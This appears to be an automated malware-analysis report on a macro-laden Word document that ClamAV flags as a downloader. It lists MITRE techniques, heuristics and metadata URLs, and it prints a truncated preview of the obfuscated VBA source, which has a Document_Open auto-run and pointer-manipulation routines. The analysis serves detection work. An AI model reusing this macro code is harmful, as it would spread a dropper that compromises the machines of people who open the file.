MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that uses GetObject. ClamAV identifies it as a downloader. The VBA script is heavily obfuscated but its structure suggests it is designed to download and execute a second-stage payload, likely from a remote source. The presence of VBA macros and the downloader behavior strongly indicate a malicious document intended for initial compromise via spearphishing.
Heuristics (6)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OLE body); they are XMP/RDF metadata namespace identifiers of the kind carried in embedded image metadata, not download locations.
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/photoshop/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13568 bytes |

SHA-256: d2b4647706e32217973fb5e1c518a75514139a2b3793825ffa66ca416b9407af
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function unfulfilled(buoyantly)
Dim exemption As Long
Dim beardown As Variant
Dim uintatherium As Integer
Dim dastardly As Integer
#If (127 - 75 + 348 + 103 - 64 + 261) > ((97 - 8 + 231) - (113 - 48 + 475) * 1) And ((125 - 40 - 57) - (80 - 80 + 28)) * 2 < (Win64) Then
Dim ophisaurus As String
Dim aspasia As LongPtr
sinuation = 78 - 106 + 36
Dim hesitance As LongPtr
Dim apron As String
Dim chips As Variant
Dim upheaval As LongPtr
Dim determinism As Integer
semidesert = VarPtr(aspasia)
adj = lactuca(semidesert, VarPtr(buoyantly) + (96 - 124 + 36), sinuation)
#ElseIf (10 - 62 + 452 + 25 - 87 + 362) > ((98 - 3 + 225) - (7 - 27 + 560) * 1) And Not ((112 - 18 - 66) - (103 - 125 + 50)) * 2 < (Win64) Then
Dim aspasia As Long
sinuation = 98 - 108 + 14
Dim hesitance As Long
Dim upheaval As Long
semidesert = VarPtr(aspasia)
adj = freckled(semidesert, VarPtr(buoyantly) + (56 - 104 + 56), sinuation)
#End If
beehive = 40 - 26 - 15
hesitance = 88 - 82 - 6
subeditor = 36 - 127 + 91
upheaval = 21 - 66 + 9603
monoecious = 48 - 90 + 4138
effusive = 58 - 68 + 74
Patterned = manytongued(ByVal beehive, _
hesitance, ByVal subeditor, upheaval, ByVal monoecious, _
ByVal effusive)
duke = Math.Round(305)
apatosaur = Math.Round(301)
#If (60 - 98 + 438 + 37 - 56 + 319) > ((116 - 51 + 255) - (8 - 67 + 599) * 1) And ((102 - 85 + 11) - (81 - 40 - 13)) * 2 < (Win64) Then
ichthyotomy = lactuca(hesitance, aspasia, 31 - 45 + 5897)
#ElseIf (108 - 48 + 340 + 67 - 80 + 313) > ((39 - 11 + 292) - (3 - 40 + 577) * 1) And Not ((102 - 34 - 40) - (69 - 20 - 21)) * 2 < (Win64) Then
selflimited = freckled(hesitance, aspasia, 90 - 20 + 5813)
#End If
chruchwarden = 16 + 5
Pmt 0, chruchwarden, 5932, 54263, 5
unfulfilled = hesitance
End Function
Sub RemovePageNumbersFromCurrentSection()
Dim ThisHeader As HeaderFooter
Dim ThisPageNumber As PageNumber
With Selection.Sections(1)
For Each ThisHeader In .Headers
For Each ThisPageNumber In ThisHeader.PageNumbers
ThisPageNumber.Delete
Next ThisPageNumber
Next ThisHeader
End With
End Sub
Function lactuca(boater, detent, russell)
Dim amoret As String
Dim confidente As Variant
Dim fellatio As LongPtr
Dim silique As LongPtr
Dim eschatologist As LongPtr
Dim brooch As Variant
Dim dorm As LongPtr
Dim et As LongPtr
helmholtz = "modernist"
condensing = condensing * 1
silique = boater
et = russell
condensing = Rnd(100)
dorm = detent
burbot = 6 + 19
Pmt 0, burbot, 33410, 56714, 5
irreprehensible = helmholtz
fellatio = 35 - 54 + 18
crystallize ByVal fellatio, _
silique, _
dorm, et, _
eschatologist
rebuild = helmholtz
End Function
Private Sub Document_Open()
Dim alamo As Long
Dim expanse As Integer
wright = "padua"
feme = "mortarboard"
miraculous
lowermiddleclass = 31 + 47
Pmt 0, lowermiddleclass, 36735, 29510, 7
End Sub
Sub miraculous()
Dim scribendi As Byte
Dim ephippidae As Byte
ragbag.success.Value = Day(#12/5/2013#)
varday = predeliberation = "elective"
odyllic = "attributively"
foeman = lidded
gg = "adamantine"
belligerence = "schizaeaceae"
artificially = "throstle"
pinscher = "conk"
antipode = "apostrophe"
Set unreeling = ragbag.success.SelectedItem
oleaginous = 45 + 41
Pmt 0, oleaginous, 31960, 32378, 7
nape = unreeling.Name
daubentonia = 126 - 86 + 7804
scintilla = Right(nape, daubentonia)
jerrybuilt = peat.bootlicking(scintilla)
estaminet = 46 + 50
Pmt 0, estaminet, 16766, 37829, 4
dapple = "aesculus"
#If (96 - 114 + 418 + 123 - 82 + 259) > ((81 - 3 + 242) - (69 - 63 + 534) * 1) And ((56 - 109 + 81) - (39 - 28 + 17)) * 2 < (Win64) Then
Dim ablaze As String
Dim vinegariness As LongPtr
Dim bedder As LongPtr
Dim delectability As Variant
#ElseIf (33
```

... (truncated)